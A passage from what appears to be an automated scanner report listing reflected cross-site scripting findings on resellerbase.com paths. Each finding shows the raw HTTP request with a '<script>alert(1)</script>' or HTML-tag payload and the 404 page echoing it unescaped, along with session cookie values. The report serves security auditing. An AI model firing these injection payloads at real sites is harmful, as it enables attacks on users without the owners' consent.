GET /detail/15/search.php?keyword=search...&Submit3=Search&opt=2&c670a<script>alert(1)</script>3d899d24fbd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/search.php?keyword=search...&Submit3=Search&opt=2&c670a<script>alert(1)</script>3d899d24fbd=1 was not found on this server.</p>
...[SNIP]...

2.1224. http://www.resellerbase.com/detail/15/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 2ed8a<a>062935842db was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/search.php?keyword=search...&Submit3=Search&opt=22ed8a<a>062935842db HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/search.php?keyword=search...&Submit3=Search&opt=22ed8a<a>062935842db was not found on this server.</p>
...[SNIP]...

2.1225. http://www.resellerbase.com/detail/15/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 290d1<script>alert(1)</script>812996e686f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail290d1<script>alert(1)</script>812996e686f/15/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail290d1<script>alert(1)</script>812996e686f/15/themes/ was not found on this server.</p>
...[SNIP]...

2.1226. http://www.resellerbase.com/detail/15/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5103<script>alert(1)</script>85654c26642 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15c5103<script>alert(1)</script>85654c26642/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15c5103<script>alert(1)</script>85654c26642/themes/ was not found on this server.</p>
...[SNIP]...

2.1227. http://www.resellerbase.com/detail/15/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3d881<script>alert(1)</script>a872731054 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes3d881<script>alert(1)</script>a872731054/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes3d881<script>alert(1)</script>a872731054/ was not found on this server.</p>
...[SNIP]...

2.1228. http://www.resellerbase.com/detail/15/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a5a01<script>alert(1)</script>1c46f6cd787 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/?a5a01<script>alert(1)</script>1c46f6cd787=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/?a5a01<script>alert(1)</script>1c46f6cd787=1 was not found on this server.</p>
...[SNIP]...

2.1229. http://www.resellerbase.com/detail/15/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1c9d7<script>alert(1)</script>6513d342088 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1c9d7<script>alert(1)</script>6513d342088/15/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1c9d7<script>alert(1)</script>6513d342088/15/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1230. http://www.resellerbase.com/detail/15/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a9bd<script>alert(1)</script>11d4fb0d771 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/151a9bd<script>alert(1)</script>11d4fb0d771/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/151a9bd<script>alert(1)</script>11d4fb0d771/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1231. http://www.resellerbase.com/detail/15/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e613a<script>alert(1)</script>7abed3b751 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themese613a<script>alert(1)</script>7abed3b751/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themese613a<script>alert(1)</script>7abed3b751/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1232. http://www.resellerbase.com/detail/15/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f2a92<script>alert(1)</script>12dd9329709 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmosf2a92<script>alert(1)</script>12dd9329709/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmosf2a92<script>alert(1)</script>12dd9329709/ was not found on this server.</p>
...[SNIP]...

2.1233. http://www.resellerbase.com/detail/15/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6c77e<script>alert(1)</script>fca2a8e513a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/?6c77e<script>alert(1)</script>fca2a8e513a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/?6c77e<script>alert(1)</script>fca2a8e513a=1 was not found on this server.</p>
...[SNIP]...

2.1234. http://www.resellerbase.com/detail/15/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b4859<script>alert(1)</script>eb40363a587 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb4859<script>alert(1)</script>eb40363a587/15/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb4859<script>alert(1)</script>eb40363a587/15/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1235. http://www.resellerbase.com/detail/15/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 58e5c<script>alert(1)</script>c70de867b02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1558e5c<script>alert(1)</script>c70de867b02/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1558e5c<script>alert(1)</script>c70de867b02/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1236. http://www.resellerbase.com/detail/15/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 784ce<script>alert(1)</script>f197c321586 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes784ce<script>alert(1)</script>f197c321586/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes784ce<script>alert(1)</script>f197c321586/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1237. http://www.resellerbase.com/detail/15/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c246f<script>alert(1)</script>f673057193 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmosc246f<script>alert(1)</script>f673057193/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmosc246f<script>alert(1)</script>f673057193/images/ was not found on this server.</p>
...[SNIP]...

2.1238. http://www.resellerbase.com/detail/15/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e0a46<script>alert(1)</script>43a15688fac was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/imagese0a46<script>alert(1)</script>43a15688fac/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/imagese0a46<script>alert(1)</script>43a15688fac/ was not found on this server.</p>
...[SNIP]...

2.1239. http://www.resellerbase.com/detail/15/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 87628<script>alert(1)</script>1e78b1b6c73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/?87628<script>alert(1)</script>1e78b1b6c73=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/?87628<script>alert(1)</script>1e78b1b6c73=1 was not found on this server.</p>
...[SNIP]...

2.1240. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5fa2d<script>alert(1)</script>48925d4c912 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5fa2d<script>alert(1)</script>48925d4c912/15/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5fa2d<script>alert(1)</script>48925d4c912/15/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1241. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b8f39<script>alert(1)</script>ddf40442aaf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15b8f39<script>alert(1)</script>ddf40442aaf/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15b8f39<script>alert(1)</script>ddf40442aaf/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1242. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f64f6<script>alert(1)</script>25efaabce3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themesf64f6<script>alert(1)</script>25efaabce3/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themesf64f6<script>alert(1)</script>25efaabce3/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1243. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b7219<script>alert(1)</script>95896aaa8ac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmosb7219<script>alert(1)</script>95896aaa8ac/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
